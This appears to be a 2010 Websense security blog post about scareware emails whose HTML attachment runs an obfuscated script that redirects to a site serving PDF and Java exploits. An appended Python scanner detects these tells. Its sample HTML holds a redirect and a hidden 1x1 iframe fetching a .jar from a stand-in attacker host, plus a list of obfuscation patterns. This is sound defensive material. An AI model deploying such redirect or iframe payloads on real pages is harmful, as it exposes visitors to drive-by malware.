June 10, 2010

Malicious virus notification emails on the prowl

Chris Astacio

Websense® Security Labs™ ThreatSeeker™ Network has detected a new wave of interesting malicious emails.  This campaign uses social-engineering scare tactics to encourage users to open the HTML attachment sent in the email.  What makes the attachment interesting is that it consists of nothing but script code, and that code looks very much like the script used in injections on legitimate Web pages.  The body of the email states that the recipient's computer has been infected with a number of viruses and that the recipient should open the attached HTML document to clean it up.

Screen shot of the email:

Looking at the raw contents of the attached HTML file, we can see that it is nothing more than an obfuscated script.  If the script is allowed to run, it opens a new Web page in your browser that redirects you either to an attack site or to a spam page.  The attack on your computer takes place only the first time the script runs; after that you are redirected to spam sites.


Screen shot of the HTML attachment:

Looking at the code on the attack site, we see that it uses a meta refresh tag to redirect visitors as soon as the page loads.  We also notice a small 1x1-pixel iframe that is loaded in your browser.

Screen shot of the site opened by "Virus Scan.html":


The attack site contains more obfuscated JavaScript that creates one iframe pointing to a PDF file and another pointing to a Java .jar file.  It then attempts to attack your computer through either of these files.
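The indicators described above (an obfuscated script in the attachment, a meta refresh redirect, a hidden 1x1 iframe, and iframes pointing at PDF or .jar carriers) can be checked for automatically at a mail gateway. The scanner below is an added example, not Websense code; the HTML sample it runs on is constructed to carry those tells and the `attacker.invalid` host is a placeholder.

```python
import re
from html.parser import HTMLParser
# Constructed sample carrying the tells the post describes (not the real attachment).
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0;url=http://attacker.invalid/landing"></head>
<body><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65'));</script>
<iframe src="http://attacker.invalid/x.jar" width="1" height="1"></iframe>
</body></html>"""

OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")
RISKY_EXTENSIONS = (".pdf", ".jar")
# A long run of %xx or \xNN escapes inside a script is the usual obfuscation tell.
ESCAPE_BLOB = re.compile(r"(%[0-9a-fA-F]{2}){8,}|(\\x[0-9a-fA-F]{2}){8,}")

class AttachmentScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._in_script = [], False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta refresh redirect: " + a.get("content", ""))
        elif tag == "iframe":
            src = a.get("src", "")
            if a.get("width") == "1" and a.get("height") == "1":
                self.findings.append("hidden 1x1 iframe: " + src)
            if src.lower().split("?")[0].endswith(RISKY_EXTENSIONS):
                self.findings.append("iframe to exploit carrier: " + src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script:
            return
        hits = [m for m in OBFUSCATION_MARKERS if m in data]
        if ESCAPE_BLOB.search(data):
            hits.append("escaped-byte blob")
        if hits:
            self.findings.append("obfuscated script: " + ", ".join(hits))

def scan_attachment(html):
    # Returns the list of indicator strings found; an empty list means nothing flagged.
    scanner = AttachmentScanner()
    scanner.feed(html)
    return scanner.findings
```

Any non-empty result is a reason to quarantine the message for analyst review rather than deliver it.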


Websense Messaging and Websense Web Security customers are protected against these attacks.
